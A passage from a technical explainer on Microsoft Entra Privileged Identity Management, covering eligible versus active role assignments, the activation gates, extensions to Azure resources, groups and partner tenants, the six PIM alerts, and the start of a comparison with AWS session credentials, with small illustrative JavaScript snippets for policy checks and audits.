    subgraph TimeBound["Time-bound duration"]
        TE["Time-bound eligible -- standing eligibility with end date"]
        TA["Time-bound active -- JIT admin after activate()"]
    end
    PE -->|"activate()"| TA
    TE -->|"activate()"| TA
    TA -->|"expire or deactivate()"| PE
    PA -->|"legacy posture being retired"| PE

The grid has only four cells. Permanent active is the pre-PIM world, the standing-admin posture every later best practice has been trying to retire. Time-bound active is the JIT-admin state, materialized only at the moment of work and expired shortly after. The two eligible states -- permanent or time-bound -- are the standing relationships between a principal and a role that grant no privilege at rest. The expressive change is small. The deployment consequences are total.
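The four cells can be enumerated mechanically. The following is a minimal sketch, assuming nothing beyond the two fields named in the tuple; `describeCell` and its output fields are hypothetical helper names.

```javascript
// Sketch: enumerate the four (type, duration) cells and what each grants at rest.
const TYPES = ['eligible', 'active'];
const DURATIONS = ['permanent', 'time-bound'];

function describeCell(type, duration) {
  return {
    type,
    duration,
    // Only active assignments grant the role's permissions.
    grantsPrivilege: type === 'active',
    // Permanent active is the standing-admin posture.
    standingAdmin: type === 'active' && duration === 'permanent',
  };
}

const grid = TYPES.flatMap((t) => DURATIONS.map((d) => describeCell(t, d)));
for (const cell of grid) console.log(cell);
```

Only two of the four cells grant privilege, and only one of those is standing admin. The eligible cells carry a relationship to the role without carrying the role.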

PIM did not add eight features. It added one field, and everything else is downstream.

This is Aha #1. The reader who came in believing standing admin persisted for forty years because operators lacked discipline now sees it differently. Operator discipline was a fragile workaround for a missing data-model field. The 1975 principle was correct. The 2012-2014 PtH whitepapers were correct. The operators were not the problem. The role-assignment object had one state to be in, and the deployment matched the data model exactly. The fix was a structural change to the data model.

The next nine years of PIM history are about extending that two-state primitive: to Azure RBAC, to security groups, to partner tenants, to the conditional-access plane, and to a detection layer that flags people who try to skip activation entirely. We walk each extension in turn. First, the mechanism itself.

5. Anatomy of an Activation

We have seen what changed. Walk through what happens, end to end, when alice@contoso.com clicks "Activate" on her eligible Global Administrator assignment at 14:00:00 on a Tuesday.

The activation flow, step by step

Six things happen, in order, and each writes audit-log evidence:

1. The eligible assignment already exists. Alice has been a permanent-eligible Global Administrator since she was hired. The PIM directory object records principal alice@contoso.com, role Global Administrator, scope directory, type=eligible, duration=permanent. Today she holds zero of the role's permissions.
2. The activation request lands on PIM. Alice clicks Activate in the Entra admin centre, or fires the equivalent Microsoft Graph call. PIM pulls the activation policy for (role=Global Administrator, scope=directory) and prepares to evaluate the gates [@ms-learn-pim-change-default-settings].
3. The policy gates evaluate. This is the load-bearing part, and the place readers most often misread the docs. The gates are per-role configurable, not universal. Microsoft Learn documents five gates the tenant can independently switch on or off [@ms-learn-pim-change-default-settings]:
   - Multifactor authentication at activation if requires_mfa is set.
   - Approval routing to named approvers or an approver group if requires_approval is set.
   - Justification text capture if requires_justification is set.
   - Ticket number capture, optionally tagged with a ticketing-system identifier, if requires_ticket is set.
   - Activation duration validation against the per-role configurable maximum -- one to twenty-four hours, with one hour the default for the highest-privileged Entra roles such as Global Administrator and Privileged Role Administrator [@ms-learn-pim-change-default-settings].
4. PIM materializes the active assignment. Microsoft Learn states the latency directly: "Microsoft Entra PIM creates active assignment (assigns user to a role) within seconds" [@ms-learn-pim-activate]. A new token Alice obtains after this moment will carry the activated role's claims.
5. The PIM audit log records the entire transaction. A new entry captures the request, the approver's decision and decision time, the justification text, the ticket reference, the activation start, and the planned expiry. The audit log is retained for thirty days by default and can be routed to Azure Monitor for longer retention [@ms-learn-pim-audit-log].
6. Auto-deactivation fires at the duration boundary. At 15:03:01 -- one hour after the assignment became active -- PIM deactivates the assignment within seconds [@ms-learn-pim-activate]. Alice can also call deactivate() explicitly to return early.

sequenceDiagram
    autonumber
    participant User as alice
    participant PIM
    participant MFA
    participant Approver as bob
    participant Graph as Microsoft Graph
    participant Audit as PIM audit log
    User->>PIM: Activate Global Administrator
    PIM->>MFA: Require MFA challenge
    MFA-->>PIM: MFA passed
    PIM->>Approver: Route approval request
    Approver-->>PIM: Approve with justification context
    PIM->>Graph: Materialize active assignment within seconds
    PIM->>Audit: Write request, decision, materialization records
    Note over PIM,Audit: Token issued with activated role claims
    Note over PIM,Graph: One-hour TTL begins
    PIM->>Graph: Auto-deactivate at expiry within seconds
    PIM->>Audit: Write deactivation record
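The activation request in the flow above can also be fired through Microsoft Graph rather than the admin centre. The sketch below only builds the request body and sends nothing. The endpoint and field names follow the Microsoft Graph v1.0 `roleAssignmentScheduleRequests` resource as documented at the time of writing and should be verified against the current reference. The helper `buildSelfActivationRequest`, the all-zero principal ID, and the `ServiceNow` ticket-system label are assumptions for illustration.

```javascript
// Sketch only: builds (does not send) a PIM self-activation request body.
// Field names follow the Graph unifiedRoleAssignmentScheduleRequest resource;
// verify against the current documentation before relying on them.
const ENDPOINT =
  'https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignmentScheduleRequests';

function buildSelfActivationRequest({
  principalId, roleDefinitionId, justification, ticketNumber, ticketSystem, hours,
}) {
  return {
    action: 'selfActivate',
    principalId,
    roleDefinitionId,
    directoryScopeId: '/', // tenant-wide (directory) scope
    justification,
    ticketInfo: { ticketNumber, ticketSystem },
    scheduleInfo: {
      startDateTime: new Date().toISOString(),
      // ISO 8601 duration; the activation policy caps the allowed maximum.
      expiration: { type: 'afterDuration', duration: `PT${hours}H` },
    },
  };
}

const body = buildSelfActivationRequest({
  principalId: '00000000-0000-0000-0000-000000000000', // placeholder object ID
  roleDefinitionId: '62e90394-69f5-4237-9190-012177145e10', // Global Administrator template ID
  justification: 'incident MSRC-2026-PIM-12345',
  ticketNumber: 'SNOW-INC-987654',
  ticketSystem: 'ServiceNow', // assumed system name
  hours: 1,
});

console.log('POST', ENDPOINT);
console.log(JSON.stringify(body, null, 2));
```

The `PT1H` duration in the body is the same value that later shows up as the gap between ActivatedAt and ExpiredAt in the audit record.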

Activation policies are configured, not assumed

Two of the most common misreadings of the documentation concern this configurability. First, MFA at activation is not universally required by PIM. The role's activation policy must be set to require it. Second, the activation maximum is configurable per role per scope inside a one-to-twenty-four-hour range, with the default for Global Administrator and Privileged Role Administrator at one hour [@ms-learn-pim-change-default-settings]. A "PIM tenant" where one role requires MFA and approval and another role requires only justification text is a perfectly valid configuration; both roles are PIM-gated, but their gate sets differ.

Activation policy: a per-role-per-scope configuration of which gates an activation must satisfy: MFA at activation, approval, justification, ticket number, and the activation maximum duration. PIM evaluates the policy at activation time. The gates are independent flags; any combination can be required [@ms-learn-pim-change-default-settings].

Note: PIM's activation maximum duration is configurable per role per scope in the one-to-twenty-four-hour range. The default value for the highest-privileged Entra directory roles -- Global Administrator and Privileged Role Administrator -- is one hour [@ms-learn-pim-change-default-settings]. Other roles default to higher values. Tighten the duration where you can; the activation cost is small, the standing-active surface saving is large.

Authentication context: gating activation, not sign-in

Conditional Access has gated sign-in since 2014. Until 2023, it had no way to gate the activation event itself. The integration between PIM and Conditional Access changes that by attaching an authentication context label to the activation, which Conditional Access can target the same way it targets any other authentication. Microsoft Learn includes the activation policy option "On activation, require Microsoft Entra Conditional Access authentication context" [@ms-learn-pim-change-default-settings].

Authentication context: a label that PIM attaches to the activation event so that Conditional Access policies can target the activation itself, not just the sign-in. Policies such as "activation of Global Administrator requires a compliant device and an MFA challenge issued within the last five minutes" become expressible without bolting on a third-party stack [@ms-learn-pim-change-default-settings].
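The example policy in that description (compliant device plus an MFA challenge no older than five minutes) can be sketched as a check keyed on the context label. This is an illustrative model only: the field names `targetAuthContext`, `requireCompliantDevice`, `maxMfaAgeMinutes`, and the label `c1` are hypothetical and do not reproduce the Conditional Access policy schema.

```javascript
// Sketch: a Conditional Access-style check that applies only when the
// activation carries the targeted authentication context label.
// All field names are hypothetical.
function evaluateActivationContext(policy, activation, nowMs) {
  if (activation.authContext !== policy.targetAuthContext) {
    return { applies: false, allowed: true };
  }
  if (policy.requireCompliantDevice && !activation.deviceCompliant) {
    return { applies: true, allowed: false, reason: 'device not compliant' };
  }
  const mfaAgeMs = nowMs - activation.lastMfaAtMs;
  if (mfaAgeMs > policy.maxMfaAgeMinutes * 60 * 1000) {
    return { applies: true, allowed: false, reason: 'MFA too old; step-up required' };
  }
  return { applies: true, allowed: true };
}

const caPolicy = { targetAuthContext: 'c1', requireCompliantDevice: true, maxMfaAgeMinutes: 5 };
const now = Date.UTC(2026, 0, 6, 14, 0, 0);

const fresh = evaluateActivationContext(
  caPolicy,
  { authContext: 'c1', deviceCompliant: true, lastMfaAtMs: now - 2 * 60 * 1000 },
  now,
);
const stale = evaluateActivationContext(
  caPolicy,
  { authContext: 'c1', deviceCompliant: true, lastMfaAtMs: now - 10 * 60 * 1000 },
  now,
);
console.log(fresh.allowed, stale.allowed); // true false
```

The design point is that the check keys on the activation's label rather than on the sign-in, so a session that signed in hours ago can still be forced through a fresh MFA challenge at the moment of elevation.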

The activation gate, as code

To make the gate-composition idea concrete, here is the activation policy as a small JavaScript function. Edit the policy or the request and re-run it.

{`
function activate(request, policy) {
  // policy gates are independent; any combination can be required
  if (policy.requires_mfa && !request.mfa_passed) {
    return { ok: false, reason: 'MFA challenge failed or absent' };
  }
  // only an explicit 'approve' decision passes; pending or denied requests fail
  if (policy.requires_approval && request.approval_decision !== 'approve') {
    return { ok: false, reason: 'Approval pending or denied' };
  }
  if (policy.requires_justification && !request.justification) {
    return { ok: false, reason: 'Justification text missing' };
  }
  if (policy.requires_ticket && !request.ticket_number) {
    return { ok: false, reason: 'Ticket number missing' };
  }
  if (request.duration_hours > policy.max_duration_hours) {
    return { ok: false, reason: 'Requested duration exceeds policy maximum' };
  }
  // activation succeeds: materialize a time-bound active assignment
  const start = new Date();
  const end = new Date(start.getTime() + request.duration_hours * 3600 * 1000);
  return {
    ok: true,
    active_assignment: {
      principal: request.principal,
      role: request.role,
      scope: request.scope,
      type: 'active',
      duration: { kind: 'time-bound', start, end }
    }
  };
}

const policy = {
  requires_mfa: true,
  requires_approval: true,
  requires_justification: true,
  requires_ticket: true,
  max_duration_hours: 1
};
const request = {
  principal: 'alice@contoso.com',
  role: 'Global Administrator',
  scope: 'directory',
  mfa_passed: true,
  approval_decision: 'approve',
  justification: 'MSRC-2026-PIM-12345',
  ticket_number: 'SNOW-INC-987654',
  duration_hours: 1
};
console.log(activate(request, policy));
`}

The function is mechanical and short for a reason. Every PIM gate is independently expressible, the policy is a record, the request is a record, and the active-assignment output is itself a record the system can audit. The complexity of PIM, such as it is, lives in the surrounding infrastructure -- the directory, the audit log, Conditional Access, the alert engine -- not in the gate itself.

The Azure-resource five-minute floor

One operational detail belongs here. Azure resource role assignments under PIM-for-Azure-Resources carry an additional latency floor: an Azure resource role assignment cannot be made for a duration of less than five minutes and cannot be removed within five minutes of being created [@ms-learn-pim-resource-roles]. This is the rare place where the cloud control plane exposes a hard minimum-time bound in its assignment-state machine, and it shapes the lower limit of any tightening strategy on Azure RBAC scopes.
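The two halves of the five-minute floor can be written as a pair of guards. This is a sketch of one reading of the rule, assuming "within five minutes" means strictly less than five minutes have elapsed; the function names are hypothetical.

```javascript
// Sketch of the five-minute floor on Azure resource role assignments.
// Boundary behaviour at exactly five minutes is an assumption.
const FLOOR_MS = 5 * 60 * 1000;

// An assignment may not be created with a duration shorter than the floor.
function canCreateAssignment(durationMs) {
  return durationMs >= FLOOR_MS;
}

// An assignment may not be removed until the floor has elapsed since creation.
function canRemoveAssignment(createdAtMs, nowMs) {
  return nowMs - createdAtMs >= FLOOR_MS;
}

const created = Date.UTC(2026, 0, 6, 14, 0, 0);
console.log(canCreateAssignment(3 * 60 * 1000));                   // false
console.log(canCreateAssignment(30 * 60 * 1000));                  // true
console.log(canRemoveAssignment(created, created + 2 * 60 * 1000)); // false
console.log(canRemoveAssignment(created, created + 6 * 60 * 1000)); // true
```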

Activation is the per-event control. But what about the standing posture across the tenant -- the eligibility surface, the drift you did not notice, the assignment configuration in places PIM does not reach by default? For that, you need access reviews, and you need to push the eligible/active primitive beyond the original twenty-eight built-in directory roles.

6. Beyond Directory Roles: Extending Eligible and Active Across Four Boundaries

PIM at GA in September 2016 covered roughly twenty-eight built-in Entra directory roles. Everything else -- Azure RBAC, security groups, partner-tenant delegation, the Conditional Access activation event -- was still single-state and permanent-active. The next nine years of PIM history are the story of closing those four boundaries, one at a time.

flowchart TD
    Core["Two-state assignment object, 2016"]
    Core --> Azure["PIM for Azure Resources, 2017-2019, RBAC at four scopes"]
    Core --> Groups["PIM for Groups, GA October 2023, membership and ownership"]
    Core --> Partner["GDAP May 2022 plus Azure Lighthouse eligible authorizations"]
    Core --> CA["PIM with Conditional Access authentication context, GA October 2023"]

Boundary 1: PIM for Azure Resources

Between 2017 and 2019, Microsoft extended the eligible-versus-active model from Entra directory roles to Azure RBAC. The extension covers four scopes -- management group, subscription, resource group, and individual resource -- and supports both built-in roles (Owner, Contributor, User Access Administrator, and the security roles) and custom roles [@ms-learn-pim-resource-roles].

The non-obvious operational property of PIM-for-Azure-Resources is that role settings do not inherit down the RBAC hierarchy. A policy you tighten on Owner at the management-group scope does not automatically flow down to Owner on subscriptions, resource groups, or resources beneath it. Each (role, scope) pair is its own policy slot, and each must be configured.

Note: Configure activation policies per role per scope explicitly across the management-group, subscription, resource-group, and resource hierarchy. A tightening at the management-group scope does not flow to subscriptions beneath it. The most common operational defect in mature PIM tenants is the unconfigured policy at a downstream scope, leaving a wide-open activation surface under what looked like a hardened parent.
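The non-inheritance rule can be turned into a simple audit. The sketch below is illustrative only: the scope names, the `role@scope` key format, and the `findUnconfiguredSlots` helper are hypothetical and do not correspond to any Microsoft API. It lists every assigned (role, scope) pair that has no explicit policy, and records whether a hardened ancestor exists, which is the case most likely to be mistaken for coverage.

```javascript
// Hypothetical data shapes for illustration; none of these names come from a Microsoft API.
// Child scope -> parent scope (null at the root of the hierarchy).
const scope_parent = {
  'mg-root': null,
  'sub-prod': 'mg-root',
  'rg-payments': 'sub-prod',
};

// Explicitly configured (role, scope) policy slots, keyed as "role@scope".
const configured_policies = new Set(['Owner@mg-root']);

// Role assignments that exist somewhere in the hierarchy.
const assignments = [
  { role: 'Owner', scope: 'mg-root' },
  { role: 'Owner', scope: 'sub-prod' },
  { role: 'Owner', scope: 'rg-payments' },
];

// Return every assigned (role, scope) pair with no explicit policy, noting
// the nearest ancestor scope that was hardened for the same role, if any.
function findUnconfiguredSlots(assignments, configured_policies, scope_parent) {
  const gaps = [];
  for (const { role, scope } of assignments) {
    if (configured_policies.has(`${role}@${scope}`)) continue;
    let hardened_ancestor = null;
    for (let s = scope_parent[scope]; s != null; s = scope_parent[s]) {
      if (configured_policies.has(`${role}@${s}`)) {
        hardened_ancestor = s;
        break;
      }
    }
    gaps.push({ role, scope, hardened_ancestor });
  }
  return gaps;
}

const gaps = findUnconfiguredSlots(assignments, configured_policies, scope_parent);
console.log(gaps);
```

In this toy hierarchy both `sub-prod` and `rg-payments` are reported, each with `mg-root` as the hardened ancestor that did not flow down.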

Boundary 2: PIM for Groups

The PIM-for-Groups timeline is three distinct events. In August 2020, Microsoft previewed the feature under its original name, "Privileged Access Groups," and limited the preview scope to role-assignable security groups [@simons-2020-aug]. In January 2023, Microsoft renamed the feature to "Privileged Identity Management for Groups" in the Entra admin centre; the underlying eligible/active model was unchanged [@ms-learn-pim-for-groups]. In October 2023, more than three years after the preview, PIM for Groups reached general availability with a broader scope -- role-assignable security groups (carried forward), non-role-assignable security groups (newly supported), and Microsoft 365 groups (newly supported), with JIT for both membership and ownership [@ms-techcommunity-pim-groups-ca-ga-2023], [@ms-learn-pim-for-groups], [@ms-learn-pim-groups-role-settings].

The three events span more than three years and should not be conflated. August 2020: preview of "Privileged Access Groups," role-assignable security groups only [@simons-2020-aug]. January 2023: rename to "PIM for Groups"; same scope and model [@ms-learn-pim-for-groups]. October 2023: general availability with the broader scope (non-role-assignable security groups plus M365 groups), and JIT for both membership and ownership [@ms-techcommunity-pim-groups-ca-ga-2023]. Two structural exclusions persist throughout: dynamic-membership groups and groups synchronized from on-premises Active Directory [@ms-learn-pim-for-groups].

The scope is broad: any Entra security group and any Microsoft 365 group, except dynamic-membership groups and on-premises-synced groups, can be PIM-enabled [@ms-learn-pim-for-groups].

The interesting design choice is that PIM-for-Groups gates two distinct surfaces per group: membership and ownership. The two surfaces each get their own activation policy [@ms-learn-pim-groups-role-settings].

PIM for Groups: the extension of PIM eligible/active assignment to Entra security groups and Microsoft 365 groups. Originally previewed in August 2020 as "Privileged Access Groups" (role-assignable security groups only) [@simons-2020-aug]; renamed to "PIM for Groups" in January 2023 [@ms-learn-pim-for-groups]; reached general availability in October 2023 with the broader scope (role-assignable security groups, non-role-assignable security groups, and M365 groups), with JIT for both membership and ownership [@ms-techcommunity-pim-groups-ca-ga-2023]. Excludes dynamic-membership groups and groups synchronized from on-premises environments [@ms-learn-pim-for-groups], [@ms-learn-pim-groups-role-settings].

A group owner can add members. A privileged access group whose membership is PIM-gated but whose ownership is permanent-active offers an unmediated elevation path: a compromised owner adds themselves as a member, bypassing the membership gate they would have had to activate. PIM-for-Groups gates both surfaces because gating membership without gating ownership is a one-bypass-step elevation. The two policies are independent; both must be set.
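The owner-bypass condition is easy to check mechanically. The following is a minimal sketch under an assumed record shape (the `membership` and `ownership` fields and the `findOwnerBypassGroups` helper are hypothetical, not a Microsoft Graph schema): it flags groups whose membership is gated while ownership is not.

```javascript
// Hypothetical record shape for illustration; not a Microsoft Graph schema.
const groups = [
  { name: 'tier0-admins', membership: 'eligible', ownership: 'permanent-active' },
  { name: 'db-operators', membership: 'eligible', ownership: 'eligible' },
  { name: 'helpdesk', membership: 'permanent-active', ownership: 'permanent-active' },
];

// A group is a one-step bypass when membership is PIM-gated but ownership is
// not: an owner can add themselves as a member without activating anything.
function findOwnerBypassGroups(groups) {
  return groups
    .filter((g) => g.membership === 'eligible' && g.ownership !== 'eligible')
    .map((g) => g.name);
}

const bypass_groups = findOwnerBypassGroups(groups);
console.log(bypass_groups);
```

Here only `tier0-admins` is flagged. The `helpdesk` group is not gated on either surface, so it is a different finding (no JIT at all) rather than a bypass of an existing gate.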

Boundary 3: Partner tenants -- GDAP and Azure Lighthouse

Until 2022, the Microsoft partner channel -- Cloud Solution Providers and Managed Service Providers -- worked through a model called Delegated Admin Privileges (DAP), in which the partner held standing Global Administrator on every customer tenant they touched. The Nobelium supply-chain campaign of 2020-2021 made the structural risk of that posture unignorable [@cisa-aa20-352a]: one compromise of one partner credential meant Global Administrator across hundreds or thousands of customer tenants simultaneously.

In May 2022, Microsoft introduced Granular Delegated Admin Privileges (GDAP) [@ms-learn-gdap], [@crayon-gdap]. GDAP replaces the standing-GA pattern with time-bound (one to seven-hundred-thirty days) and role-scoped delegation between partner and customer tenants. Microsoft Learn's framing makes the design explicit: "GDAP is a security feature that provides partners with least-privileged access following the Zero Trust cybersecurity protocol. It lets partners configure granular and time-bound access to their customers' workloads in production and sandbox environments. Customers must explicitly grant the least-privileged access to their partners" [@ms-learn-gdap].

Granular Delegated Admin Privileges (GDAP): the May 2022 Microsoft Partner Center capability that replaces legacy DAP's standing-Global-Administrator-on-every-customer-tenant pattern with time-bound (one to seven-hundred-thirty days) and role-scoped delegation between partner and customer tenants. GDAP is the partner-tenant analogue of PIM eligible assignment [@ms-learn-gdap].

The Azure plane has a parallel construct. Azure Lighthouse eligible authorizations, introduced alongside GDAP, extend PIM-for-Azure-Resources eligibility across the tenant boundary [@ms-learn-lighthouse-eligible]. The customer (not the partner) controls the PIM policy on the delegated authorization. One important exception: service principals cannot use eligible authorizations, because there is currently no way for a service principal to elevate its access [@ms-learn-lighthouse-eligible]. The application-identity gap we reach in section 9 reaches into Lighthouse too.

Boundary 4: PIM and Conditional Access authentication context

The October 2023 GA wave closed the activation-gate-versus-sign-in-gate gap. Before October 2023, Conditional Access could gate sign-in into the tenant, but it could not gate the activation event itself. After October 2023, an authentication-context-tagged Conditional Access policy can target activation specifically [@ms-techcommunity-pim-groups-ca-ga-2023]. A policy of the form "activation of any control-plane role requires a compliant device and a fresh MFA challenge" becomes expressible without third-party tooling [@ms-learn-pim-change-default-settings].

The retirement of Tier-0, Tier-1, Tier-2

The umbrella framing has also shifted. Microsoft's 2014 Tier-0 / Tier-1 / Tier-2 model is being progressively retired in favour of the Enterprise Access Model (EAM), which uses control plane, management plane, and data/workload plane as the structural divisions [@ms-learn-eam]. EAM is cloud-native where Tier-0/1/2 was on-premises-centric. Microsoft Learn states the mapping: "Tier 0 expands to become the control plane and addresses all aspects of access control", and "what was tier 1 is now split into the following areas: Management plane ... Data/Workload plane" [@ms-learn-eam].

Enterprise Access Model (EAM): the post-2021 Microsoft reference architecture that replaces the Tier-0/Tier-1/Tier-2 administrative model with a plane-based division: control plane, management plane, and data/workload plane. EAM is cloud-native and zero-trust-friendly where Tier-0/1/2 was on-premises-centric [@ms-learn-eam]. Microsoft's RaMP -- the Rapid Modernization Plan -- is the post-2018 deployment roadmap that operationalizes EAM [@ms-docs-github-ramp].

The retirement is partial. The practitioner audience still uses Tier-0/1/2 more often than EAM in day-to-day language. The Microsoft Learn page for Securing Privileged Access explicitly cross-references both [@ms-learn-spa-overview].

Coverage is one half of the story. The other half is detection. What does PIM do when someone in the Privileged Role Administrator role simply assigns Global Administrator to a user directly through Microsoft Graph, bypassing the activation workflow entirely?

7. The Detection Layer: Six PIM Alerts and the Assignment-Bypass Class

PIM gates activation. The first question every adversary thinks of, and every architect should think of next, is: what about the assignment itself? What happens when someone in the Privileged Role Administrator role just creates a permanent-active Global Administrator assignment directly, skipping the eligible-to-active workflow entirely?

The answer is the article's second aha moment, and it is deliberately surprising.

The six PIM Alerts

Microsoft Learn documents seven named alerts in the PIM Alerts surface for Microsoft Entra roles [@ms-learn-pim-alerts]. Six of them are behavioural detections; the seventh is a licensing-precondition alert that fires when the tenant lacks the appropriate license.

The seventh alert, named "The organization doesn't have Microsoft Entra ID P2 or Microsoft Entra ID Governance," is a low-severity licensing-precondition alert. The "six PIM Alerts" framing in this article refers to the six behavioural alerts; the licensing alert is structurally distinct.

The six behavioural alerts, with the canonical names verbatim from the documentation, are:

| # | Alert (verbatim) | Severity | What it detects | Configurable threshold |
|---|---|---|---|---|
| 1 | There are too many Global Administrators | Low | Tenant exceeds a tunable count and percentage of standing GAs | Minimum count 2-100 and percentage 0-100% |
| 2 | Roles are being assigned outside of Privileged Identity Management | High | A privileged role assignment was created via Microsoft Graph or the classic admin centre without going through PIM | None (binary) |
| 3 | Roles are being activated too frequently | Low | Post-hoc activation-frequency anomaly | Activation count and time window |
| 4 | Administrators aren't using their privileged roles | Low | Staleness on activation; eligible assignment unused | 0-100 day threshold |
| 5 | Roles don't require multifactor authentication for activation | Low | Configuration drift on the per-role activation policy | None (binary on role policy) |
| 6 | Potential stale accounts in a privileged role | Medium | Sign-in staleness on a privileged principal | 1-365 day threshold |

The second row -- "Roles are being assigned outside of Privileged Identity Management" -- is the load-bearing one. Microsoft Learn rates it High severity because it is the alert that fires when somebody routed around PIM entirely [@ms-learn-pim-alerts]. The verbatim documentation reads: "Privileged role assignments made outside of Privileged Identity Management aren't properly monitored and might indicate an active attack" [@ms-learn-pim-alerts].

Assignment-bypass alert: the High-severity PIM Alert "Roles are being assigned outside of Privileged Identity Management." It fires when a privileged role is assigned via a path other than PIM -- typically via Microsoft Graph, the classic admin centre assignment surface, or PowerShell. The alert is detective. It fires after the assignment is created [@ms-learn-pim-alerts].

Detective, not preventive -- and why

Read the definition again. The alert fires after the assignment is created. PIM does not block direct assignments outside its workflow.

For most architects this lands hard. The reasonable next thought is "if PIM does not block the bypass, what is the point?" Sit with that thought, then read the design rationale.

The Microsoft Graph endpoints that allow direct role assignment are the integration surface every legitimate administrative tool uses. Identity Governance products use them. CI/CD identity provisioning scripts use them. Break-glass automations use them. Microsoft's own admin centres use them in some configurations. The customer-side tools that scan, audit, remediate, and provision against the tenant use them. A preventive block on direct assignment would break every one of those integrations. It would also break PIM itself; the eligible-to-active materialization step is a write to the same assignment surface.

Note: PIM does not block direct role assignments outside its workflow because blocking would break the Microsoft Graph integration surface every legitimate administrative tool uses. The High-severity assignment-bypass alert is detective: it fires after the assignment is created. Customers who need preventive blocking layer a separate Conditional Access policy on the Graph endpoint, an Azure Policy at the management-group scope, or an entitlement-management workflow on top of PIM.
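The detective character of the alert can be illustrated with a post-hoc scan. This is a sketch under stated assumptions: the audit-record shape, the `via` field, and `findAssignmentBypasses` are hypothetical stand-ins, and real AuditLogs entries use different fields. The point is structural: the filter runs over records that already exist, so it can only report, not block.

```javascript
// Hypothetical audit-record shape for illustration; real AuditLogs fields differ.
const audit_records = [
  { id: 1, operation: 'add-role-assignment', role: 'Global Administrator', principal: 'alice@contoso.com', via: 'pim' },
  { id: 2, operation: 'add-role-assignment', role: 'Global Administrator', principal: 'mallory@contoso.com', via: 'graph-direct' },
  { id: 3, operation: 'add-role-assignment', role: 'Reports Reader', principal: 'bob@contoso.com', via: 'graph-direct' },
];

// Which roles count as privileged is a tenant decision; this set is an assumption.
const privileged_roles = new Set(['Global Administrator', 'Privileged Role Administrator']);

// Detective, not preventive: every record here describes an assignment that
// has already been written by the time the scan runs.
function findAssignmentBypasses(records, privileged_roles) {
  return records.filter(
    (r) =>
      r.operation === 'add-role-assignment' &&
      privileged_roles.has(r.role) &&
      r.via !== 'pim'
  );
}

const bypasses = findAssignmentBypasses(audit_records, privileged_roles);
console.log(bypasses.map((r) => `${r.principal} -> ${r.role}`));
```

Record 3 is also a direct Graph write, but it is not flagged because the role is not in the privileged set, which mirrors why a blanket block on the write path would catch far more than attacks.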

This is Aha #2. The reader who walked in expecting PIM to be a "deny direct assignments" product walks out understanding why the design says "alert loudly via High severity, then let the customer layer preventive controls based on their tooling estate." The trade-off is named, not hidden.

The 1000-notification ceiling and the SIEM-side correlation

One operational footnote and one wider observation. The notification fan-out has a hard cap: "The maximum number of notifications sent per one event is 1000. If the number of recipients exceeds 1000, only the first 1000 recipients will receive an email notification" [@ms-learn-pim-alerts]. Very large tenants whose privileged groups exceed the cap should not rely on email-notification fan-out alone.

The detection layer beyond PIM Alerts is Microsoft Sentinel UEBA, which builds dynamic behavioural profiles for users, hosts, IP addresses, applications, and other entities and emits anomaly scores against AuditLogs operations including role-eligibility additions and activations [@ms-learn-sentinel-ueba]. Sentinel UEBA is the closest 2026 Microsoft-shipped activation-anomaly-scoring surface; it is detective SIEM correlation, not synchronous gating.
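The effect of the 1000-recipient cap quoted above is simple arithmetic, sketched here for a hypothetical 1250-recipient event. The `splitRecipients` helper is illustrative, and the ordering that determines which recipients count as "the first 1000" is an assumption; the documentation quoted in this section does not specify it.

```javascript
const MAX_NOTIFICATIONS_PER_EVENT = 1000; // the documented per-event cap

// Split a recipient list into those who would be notified and those who
// would silently receive nothing. List order is an assumption of this sketch.
function splitRecipients(recipients, cap = MAX_NOTIFICATIONS_PER_EVENT) {
  return {
    notified: recipients.slice(0, cap),
    dropped: recipients.slice(cap),
  };
}

const recipients = Array.from({ length: 1250 }, (_, i) => `admin${i}@contoso.com`);
const { notified, dropped } = splitRecipients(recipients);
console.log(notified.length, dropped.length); // prints 1000 250
```

The 250 dropped recipients get no signal at all from email, which is why a SIEM-side export is the safer primary channel at that scale.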

The wider observation is that the PIM detection layer is one piece of a larger pipeline. PIM Alerts give you the High-severity assignment-bypass detection. Microsoft Sentinel UEBA gives you per-user behavioural-anomaly scoring against the audit-log events [@ms-learn-sentinel-ueba]. Entra ID Protection gives you sign-in-risk and user-risk classifications for the principal whose token was used. The mature 2026 deployment correlates all three; the assignment-bypass alert is the floor of that pipeline, not the ceiling.

Microsoft solved the JIT-admin problem with a two-state assignment object, four extension surfaces, and a six-alert detection layer. Did the rest of the industry agree? Look at what AWS and Google bet on, and at the third-party vault market that predates both.

8. Competing Architectures: AWS Sessions, GCP Bindings, and the Vault Model

Microsoft bet on a two-state assignment object. The rest of the industry placed different bets.

AWS bet on the session credential. Google bet on the conditional binding. The third-party PAM market bet on the vault. HashiCorp bet on the ephemeral credential. Each architecture is a different answer to one question: what should be the bounded unit of privilege? PIM bounds the assignment state; AWS bounds the session; GCP bounds the binding; CyberArk and Vault bound the credential. The methods are architecturally distinct, and they coexist in real estates more often than they compete.

AWS: bound the session

AWS IAM Identity Center plus the Security Token Service AssumeRole API bound the session, not the assignment. Permanent role-bindings -- permission sets attached to identities -- are themselves standing. The temporary part is the session that materializes when the identity calls AssumeRole. AWS documents this directly: "Temporary security credentials are short-term, as the name implies. They can be configured to last for anywhere from a few minutes to several hours. After the credentials expire, AWS no longer recognizes them or allows any kind of access from API requests made with them" [@aws-temp-creds].

The session lifecycle is concrete. AssumeRole returns an access key, a secret key, and a session token, with a minimum fifteen-minute and a maximum twelve-hour session duration; the API operation default is one hour [@aws-roles-use]. IAM Identity Center permission sets ship with a one-hour default and a one-to-twelve-hour configurable range [@aws-sessionduration].

AssumeRole: the AWS Security Token Service API by which a principal materializes a time-bounded session credential -- access key, secret key, session token -- from a permanent role-binding. The session is the ephemeral artifact; the binding is permanent [@aws-temp-creds], [@aws-roles-use].
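The session bounds described above (fifteen-minute minimum, twelve-hour maximum, one-hour default) can be expressed as a small validator. This is a local sketch, not a call into the AWS SDK: `resolveSessionDuration` and `sessionExpiry` are hypothetical helpers, and the sketch ignores any tighter cap that an individual role's own settings may impose.

```javascript
const MIN_SESSION_SECONDS = 15 * 60; // fifteen-minute minimum
const MAX_SESSION_SECONDS = 12 * 60 * 60; // twelve-hour maximum
const DEFAULT_SESSION_SECONDS = 60 * 60; // one-hour API default

// Resolve the effective session length, falling back to the default when the
// caller does not ask for a specific duration.
function resolveSessionDuration(requested_seconds) {
  if (requested_seconds === undefined) return DEFAULT_SESSION_SECONDS;
  if (!Number.isInteger(requested_seconds)) {
    throw new RangeError('duration must be a whole number of seconds');
  }
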